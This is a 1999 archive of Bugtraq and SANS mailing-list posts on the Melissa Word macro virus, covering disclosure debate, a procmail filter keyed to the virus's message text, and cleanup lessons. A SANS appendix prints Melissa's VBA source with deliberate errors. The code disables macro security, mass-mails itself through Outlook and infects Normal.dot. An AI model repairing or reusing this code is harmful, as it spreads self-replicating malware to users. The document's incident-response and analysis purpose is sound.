BASIC Application extension thing that gets run by the application when the document is open. According to CERT neither Word97 nor Word2000 list the macro when an infected document is opened with macros disabled, even if you explicitly look for macros -- i.e. you can only see the macro if you let it execute. This is absurdly stupid. (And of course what's also insidious, and new to me, about this "virus" is that it immediately and silently disables the feature which would normally require confirmation before executing macros, thus opening up the door for its simpler bretheren, so to speak.) -- Greg A. Woods +1 416 218-0098 VE3TCP Planix, Inc. ; Secrets of the Weird ---------------------------------------------------------------------------- Date: Sat, 27 Mar 1999 21:58:17 -0800 From: Nate Lawson To: BUGTRAQ@netspace.org Subject: Malicious code detection and full disclosure I have been getting a lot of flames and veiled threats from individuals and "virus researchers" for posting the code yesterday. There seems to be a lot of misinformation going around so I wanted to clarify the situation. These people are all producing the same arguments: 1. "Posting the source allows someone to know how to write a Macro virus" Yes, and anyone of the 100,000 or more people who got the virus the other day can buy VB and do File->Open and see the source. Repeat after me: "Word macros are INTERPRETED". All symbol information is present. No decompilation necessary. 2. "By reformatting the source, you have created a new variant" What? Your virus scanner could be thwarted by adding whitespace? Someone has a problem but it isn't me. Perhaps you'd best learn from the sandbox mechanisms of Java or virus scanners like F-PROT. A virus is not a virus because it has the string "By 3le3t3 DudEZ" followed by three tabs. It is a virus because it does things like update Normal.dot. Repeat after me: "Pattern matching alone does not a virus scanner make". Just as in the recent thread about security scanners doing version-checking instead of exploiting a hole, the best answer is to use a combination of techniques to identify flaws or malicious code and then notify the user of any uncertainties in the detection mechanism. A perfect parallel to this is the Internet worm. We were reminded of that time as we paused the Exchange SMTP service to keep the program from spreading. Also, it was important to quickly analyze the program, making sure it did nothing malicious like mailing a person's files to another location. After doing this, I believed the code itself would help others do the same if they needed to. An important note is that the Symantec and McAfee web pages describing the virus both left out important information (for instance, avertlabs.com neglected to mention the active document and Normal.dot file infection). If I had made any mistakes in my analysis, another could have determined this for himself. A good reference is the paper "With Microscope and Tweezers, An Analysis of the Internet Worm" by Mark Eichin and Jon Rochlis. It can be found at: http://www.mit.edu:8001/people/eichin/www/virus/main.html In short, this is the same full disclosure vs. security through obscurity debate. Make your own decision what is appropriate; my mind has been made up in regards to this for at least a decade. Viruses tend to be uninventive and boring. This one was extremely unsophisticated, exploited no new holes, and required user carelessness to spread. I only got involved because I had to help fend off the nuisance Friday. I hope everyone found the postings useful and will demand better virus protection than string matching from their virus scanner vendor as well as request that Microsoft add more virus prevention than "enable macros? yes/no" and disallow macros from doing things like sending mail or writing to files without notice to the user. -Nate ---------------------------------------------------------------------------- Date: Sat, 27 Mar 1999 20:12:22 -0800 From: John D. Hardin To: BUGTRAQ@netspace.org Subject: Re: Blocking the Melissa Trojan On Sat, 27 Mar 1999, Brett Glass wrote: >At 03:28 PM 3/27/99 -0800, John D. Hardin wrote: >>On Sat, 27 Mar 1999, Brett Glass wrote: >> >>> Excellent. Is there a default "poisoned executables" file in the >>> package? Or do admins have to construct a list themselves? >> >>They have to make it themselves if they wish to use the facility. The >>web page has a suggested list of filenames. > > Sounds good. Now, for the next twist to the story. > > It turns out that the Melissa code also infects NORMAL.DOT, so that > the computer starts producing infected documents. When one of those > documents hits a machine that hasn't been infected yet, that machine > sends out a barrage of e-mail.... Using the NEW document as the > attachment! It'll have a different name. So, we also need to filter > by subject and body. That's a job that regular procmail is well suited to. If the subject is fixed (hang on, reading bugtraq...) Per Aleph1: The subject line is "important Message From ". The body consist of the text "Here is that document you asked for... don't show anyone else;-)". That's fairly simple... :0 H * ^Subject:.*important Message From { :0 B * Here is that document you asked for * don't show anyone else * ^Content-.*: .*\.do[ct] { LOG='REJECT Possible "Melissa" Microsoft Word macro worm: ' :0 security-quarantine } } -- John Hardin KA7OHZ jhardin@wolfenet.com pgpk -a finger://gonzo.wolfenet.com/jhardin PGP key ID: 0x41EA94F5 PGP key fingerprint: A3 0C 5B C2 EF 0D 2C E5 E9 BF C8 33 A7 A9 CE 76 ----------------------------------------------------------------------- In the Lion the Mighty Lion the Zebra sleeps tonight... Dee de-ee-ee-ee-ee de de de we um umma way! ----------------------------------------------------------------------- 52 days until Star Wars episode I ---------------------------------------------------------------------------- Date: Sat, 27 Mar 1999 12:16:29 +0000 From: Vesselin Bontchev To: NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM Subject: Re: [BugTraq] Melissa Macro Virus (fwd) Aaron Wood writes (my comments are on Trend's press release forwarded by him): > In Word97, the virus disables the Tools/Macro menu commands, the > Confirm Conversions option, the MS Word macro virus protection, and > the Save Normal Template prompt. In Word 2000, the virus disables the Tools/Macro/Security menu. > The name of the original infected attachment was List.doc, but it > could be any name. Theoretically, yes. But keep in mind, that the virus sends itself by e-mail only when it infects a clean system. What it sends, is the document which as infected the system. Originally, the virus was distributed in a file named LIST.DOC and posted to alt.sex by a person known to have posted new viruses to the newsgroups before. So, in most cases this is the document which infects the systems for the first time and it is what is sent around. The only way to begin sending something else is if you get infected by opening another user's infected document which you have received by other means (i.e., not by the virus sending it to you). > If the user does not have Outlook, the virus will not work. That's not true - the virus works perfectly, in the sense that it replicates and infects. It just can't send itself around in e-mail attachments. But, as we know, this is by far not the only way a virus can use to spread. :-) Another thing - the virus never terminates the copy of Outlook it starts - at least not explicitly. I haven't verified that, but if that copy really remains in memory, opening several infected documents would eventually slow down and crash your system - because of the many copies of Outlook running in the background. The virus starts Outlook each time you open an infected document - although it sends itself by e-mail only if the system wasn't already infected. > After that, the virus checks to see if the normal template and active > document are infected, and if either is not, it infects the file. "File" here means "whatever is not infected - either the active document or the normal template". > Trend Micro has detection for this virus in its latest pattern update, Most anti-virus producers have. The update for our product (F-PROT and F-MACROW) can be found at the usual place: ftp://ftp.complex.is/pub/macrdef2.zip Regards, Vesselin -- Vesselin Vladimirov Bontchev, not speaking for FRISK Software International, Postholf 7180, IS-127, Reykjavik, Iceland producers of F-PROT. e-mail: bontchev@complex.is, tel.: +354-561-7273, fax: +354-561-7274 PGP 2.6.2i key fingerprint: E5 FB 30 0C D4 AA AB 44 E5 F7 C3 18 EA 2B AE 4E ---------------------------------------------------------------------------- Date: Mon, 29 Mar 1999 14:46:24 -0500 (EST) From: sans@clark.net Subject: EXTRA: SANS Flash Report on the Melissa Virus Once or twice a year, the magnitude of a security event is great enough to merit a SANS Flash Report. It is amazing and coincidental that it happens in the same 24 hour period that we send out the first SANS Newsbites. NOTE: SANS will be changing email and web servers this week. We hope to avoid service interruptions, but some error might creep in. Problems to . Table of Contents: 1. What Melissa teaches us 1.1 Infection Speed 1.2 Collateral Damage 1.3 Need for Defense in Depth 2. One site's experience in cleaning up after a Melissa infestation 3. Conclusion Appendix: Melissa Source Code You will already have heard of the Melissa virus, at least from the SANS Newsbites, and probably also from newspapers and friends, as well. An excellent description of the virus, including how to identify it and contain it at the host level, was developed by the Computer Emergency Response Team at Carnegie Mellon University. This document is available at: http://www.cert.org/advisories/CA-99-04-Melissa-Macro-Virus.html . The major anti-virus vendors have already released descriptions and anti-viral signatures. URLs for NAI and Symantec are listed below: http://www.avertlabs.com/public/datafiles/valerts/vinfo/melissa.asp http://www.symantec.com/avcenter/venc/data/mailissa.html The rapid response of these organizations has been very impressive, and your response should be equally rapid. If you have not yet taken the steps described in the CERT advisory, follow the instructions referenced above and get your site's virus signatures updated and the infected machines contained and cleaned. Then read the rest of this document that tells some of the lessons learned and also the bigger picture surrounding the Melissa Macro virus. We discuss the implications of information gathering viruses like Melissa, the process and impact of cleaning up after an outbreak at a military site and finally, share a non-working version of the code to help you understand what these viruses do. 1. What Melissa teaches us 1.1 Infection Speed According to NAI's web site listed above, the virus was first discovered on an "alt.sex" newsgroup and spread rapidly. On the same day the virus was first discovered "in the wild" it caused major infections and reports >from a large number of Department of Defense and Department of Energy sites. Many of you will probably find out today that your site has been infected as well. This serves as a warning how fast a virus with an unknown signature can spread. A modified, non-operative copy of the source code is included as an appendix to this document. If you search the listing for the string "For y = 1 To", you can see how the virus replicated so rapidly by going through Microsoft Outlook address books and sending itself to the first 50 entries in each book. Sections in the code that have been the subject of news reports are marked with comments that begin with ***. Useful Background Information: In the March 2nd SANS First Tuesday Intrusion Detection Web Broadcast, archived at http://www.sans.org/webarchives.htm, Stephen Northcutt described another MS Word Macro Virus, M97.Marker.a. Marker is an information gathering virus which uses FTP to send the Microsoft Office registration information of infected systems to outside organizations. Northcutt described how this same technique would allow a prospective attack to develop an infection map and by knowing who sends what to whom, to target future attacks. 1.2 Collateral Damage The Melissa virus apparently does not create any other damage in the sense of deleting, or stealing files. However, when the smoke clears, the cost of dealing with Melissa will be measured in the millions of dollars. It also directly affects sites' ability to send and receive email. One network engineer, who worked at one of the first sites to report the problem last Friday March 26, said "I knew something was wrong before I knew what was wrong. I could feel the network going slower and slower. As I looked into it, I found the exchange mail servers were melting down." One of the lessons of Melissa is that a macro virus can hit very fast and very hard. The engineer went on to say, "As I composed the last email of the day, a message hit the Inbox of my Microsoft Outlook email application. The subject line read: "Important Message From [Jane Doe]". I viewed the message, and the body read "Here is that document you asked for... don't show anyone else ;-)" Attached was a Microsoft Word document titled "list1.doc". "Although I hadn't requested any documents from [Jane Doe], I was expecting a couple of them from other people. It wasn't inconceivable to think that she had become involved, even though I didn't know who she was. I double-clicked on the Word document. A pop-up window appeared, warning me that a macro was contained in the document, and that macros can potentially be dangerous. I knew that... :-) So, I shut down the Word application, and checked the document with several of the virus detection packages that I had. Everything appeared clean." "Since this was from someone in my organization, apparently a trusted source, I went ahead and opened the document with the macros enabled. In less than a second, a duplicate of the message had hit my mailbox, this time with my name attached. I hit the power-off button on my computer, but it was late. The payload had been delivered. My name was now attached to a file containing pornographic web sites, and an apparent username and password for each site. Moments later, duplicate messages from others who had made the same mistake began to appear." "At this point I knew we, as an organization, were in trouble. This virus (or worm) was snowballing fast, too fast. I immediately called our information systems security manager, only to find that his phone was already busy. I left a voicemail detailing my appraisal of the situation, and my fear that this incident could get serious... very quickly. What I didn't know was that I was too late, it was already *very* serious." 1.3 Need for Defense in Depth Though Melissa is primarily spread by e-mail, passing an infected floppy disk works just as well to move the virus to a new system, possibly even a new organization. If there was ever any doubt about whether we need to take virus countermeasures seriously, that time is past. We recommend virus scanning at the firewall, on servers, and on the desktop systems as well as physical entry points for magnetic media for sites that want to avoid the kind of punch Melissa exhibited. 2. One site's experience in cleaning up after a Melissa infestation Here's a first-person description of the process one site used to clean up after being hit by Melissa. "As soon as we discovered the virus late Friday afternoon, we disconnected our servers (all SMTP relays and Exchange servers at our Internet connection) from the network until we could contain the infection. This happened at approximately 1800 hours Friday. "System administrators for both corporate and departmental Exchange servers worked through Friday night and well into Saturday. Many returned Saturday and again on Sunday to complete the isolation and cleanup. They cleaned up the Exchange servers with updated anti-viral signatures as soon as they were available. The corporate servers and one departmental server were ready to come back on-line late Sunday. We left IMS (Internet Mail Service) disabled until we could contain (filter) email at the SMTP server. "Our version of sendmail is one removed from the latest and filter updates provided by the author would not work on our version. We resorted to getting the word out for ALL users to update the AV signatures and refrain from sending Word docs until any with macros had been identified as coming from trusted sources. The administrator for the SMTP relay host downloaded a trial version of InterScan VirusWall from TrendMicro. For more info, see: http://www.antivirus.com/products/isvw/index.htm "The clean-up picture would have been much bleaker if we hadn't had so many things in our favor: * System administrators were still at work when the problem started (approximately 1640 on Friday). * Most of the users were gone for the weekend (and didn't compound the problem by manually sending additional copies of the infected document). * All of the system administrators involved in the clean up had been trained in incident handling based on the SANS' Incident Handling Step by Step approach. * The person who needed to make key decisions was trained in incident response and had already begun carrying a cell phone. * Base commanders recognized the expertise that was in use and supported the Incident Handling team by not directing what needed to be done (at least so far)." Note: The stages of incident handling are: preparation, identification, containment, eradication, and follow-up. The URLs at the beginning of this document can help you with identification and eradication. Your organization may need to consider email server down time in order to achieve containment. You may also want to consider setting up non-email communication channels for your organization. If you do not know how to build a telephone call tree, look for a "soccer mom". They know how to spread important information very efficiently. In this way, if you do suffer an email meltdown, you can still get important information, such as where to acquire the latest anti-virus software, to your users. 3. Conclusion Because Melissa exploits one of the most valuable benefits of the net -- the ability to share documents -- to propagate and to multiply itself, it will affect far more people far more quickly than earlier viruses. The silver lining in this cloud is that a relatively benign virus like Melissa is a low-cost way of gaining user awareness. That same mechanism can be used by a more malicious attacker to make private information public and to destroy large amounts of important data. It makes sense for you to use this opportunity to establish three capabilities if you have not already done so: (1) user responsibility and active involvement in protecting their systems (2) an incident handling capability (Order Incident Handling Step-by-Step from the SANS bookstore www.sans.org if you don't already have a roadmap) (3) user awareness of what to look for, whom to call, and what to say when they call about a security threat. In addition, we at SANS want to hear your experiences and the lessons you learned in responding to Melissa. Please send your Melissa-related tips, tricks, techniques, experiences and lessons learned to info@sans.org with Melissa in the subject line. This type of sharing can help all sites be in a better position to respond the next time an event like this occurs. Appendix: Melissa Source Code NOTE: Several errors have been introduced into this copy of the code as a safety measure. It will not run in this form. We hope the code we changed will not overly impact your opportunity to understand how the software works, but we could not be responsible for furthering the spread of the live version of Melissa. Text comments have been inserted at the "famous" locations preceded by three asterisks "***" *** Begins by checking security, the environment, and whether already infected Private Sub Document_Open() On Error Resume Next If System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") <> "" Then CommandBars("Macro").Controls("Security...").Enabled = False System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") = 1& Else CommandBars("Tools").Controls("Macro").Enabled = False Options.ConfirmConversions = (1 - 1): Options.VirusProtection = (1 - 1): Options.SaveNormalPrompt = (1 - 1) End If Dim UngaDasOutlook, DasMapiName, BreakUmOffASlice Set UngaDasOutlook = CreateObject("Outlook.Application") Set DasMapiName = UngaDasOutlook.GetNameSpace("MAPI") If System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\", "Melissa?") <> "... by Kwyjibo" Then If UngaDasOutlook = "Inlook" Then DasMapName.Logon "profile", "password" For y = 1 To DasMapName.AddressLists.Count Set AddyBook = DasMapiName.AddressLists(y) Set BreakOffASlice = UngaDasOutlook.CreateItem(0) For oo = 1 To AddyBook.AddressEntries.Count Peep = AddyBook.AddressEntries(x) BreakOffASlice.Recipients.Add Peep x++ If x < 50 Then oo = AddyBook.AddressEntries.Count Next oo BreakOffASlice.Subject = "Important Message From " & Application.UserName BreakUmOffASlice.Body = "Here is that document you asked for ... don't show anyone else ;-)" *** Here is the classic subject line "Important Message From" This could change of course in future versions *** BreakUmOffASlice.Attachments.Add ActiveDocument.FullName BreakUmOffASlice.Send Peep = "" Next y DasMapName.Logoff End If System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\", "Melissa?") = "... by Kwyjibo" End If Set ADI1 = ActiveDocument.VBProject.VBComponents.Item(1) Set NTI1 = NormalTemplate.VBProject.VBComponents.Item(1) NTCL = NTI1.CodeModule.CountOfLines ADCL = ADI1.CodeModule.CountOfLines BGN = 2 If ADI1.Name <> "Melissa" Then If ADCL > 0 Then _ ADI1.CodeModule.DeleteLines 1, ADCL Set ToInfect = ADI1 ADI1.Name = "Melissa" DoAD = True End If If NTI1.Name <> "Melissa" Then If NTCL > 0 Then _ NTI1.CodeModule.DeleteLines 1, NTCL Set ToInfect = NTI1 NTI1.Name = "Melissa" DoNT = True End If If DoNT <> True And DoAD <> True Then GoTo END If DoNT = True Then Do While ADI1.CodeModule.Lines(1, 1) = "" ADI1.CodeModule.DeleteLines 1 Loop ToInfect.CodeModule.AddFromString ("Private Sub Document_Close()") Do While ADI1.CodeModule.Lines(BGN, 1) <> "" ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1) BGN = BGN + 1 Loop End If If DoAD = True Then Do While NTI1.CodeModule.Lines(1, 1) = "" NTI1.CodeModule.DeleteLines 1 Loop ToInfect.CodeModule.AddFromString ("Private Sub Document_Open()") Do While NTI1.CodeModule.Lines(BGN, 1) <> "" ToInfect.CodeModule.InsertLines BGN, NTI1.CodeModule.Lines(END, 1) BGN = BGN + 1 Loop End If CYA: If NTCL <> 0 And ADCL = 0 And (InStr(1, ActiveDocument.Name, "Document") = False) Then ActiveDocument.SaveAs FileName:=ActiveDocument.FullName ElseIf (InStr(1, ActiveDocument.Name, "Document") <> False) Then ActiveDocument.Saved = True End If 'WORD/Melissa written by Kwyjibo 'Works in both Word 2000 and Word 97 'Worm? Macro Virus? Word 97 Virus? Word 2000 Virus? You Decide! 'Word -> Email | Word 97 <--> Word 2000 ... it's a new age! If Day(Now) = Minute(Now) Then Selection.TypeText " Twenty-two points, plus triple-word-score, plus fifty points for using all my letters. Game's over. I'm outta here." End Sub *** The lines above are some of the most published information about this virus. Though you can look for the virus with intrusion detection and other string matching security tools by searching for keywords like "Kwyjibo", simple modifications of the code could change these. *** ---------------------------------------------------------------------------- Date: Sun, 28 Mar 1999 21:40:59 -0600 From: Simple Nomad To: BUGTRAQ@netspace.org Subject: "Leaking" of docs via Melissa An interesting thing -- as users are infected with Melissa some of the new documents they create after infection become the carrier and are mailed out. If you scan for inbound messages, it would be advised to scan for outbound messages as well. I received a copy of an employee evaluation >from an old client, and considering the poor rating of this guy I'd say there's a lawsuit in the making as it apparently went not only to me but to an internal email bulletin board. Simple Nomad // thegnome@nmrc.org // ....no rest for the Wicca'd.... www.nmrc.org //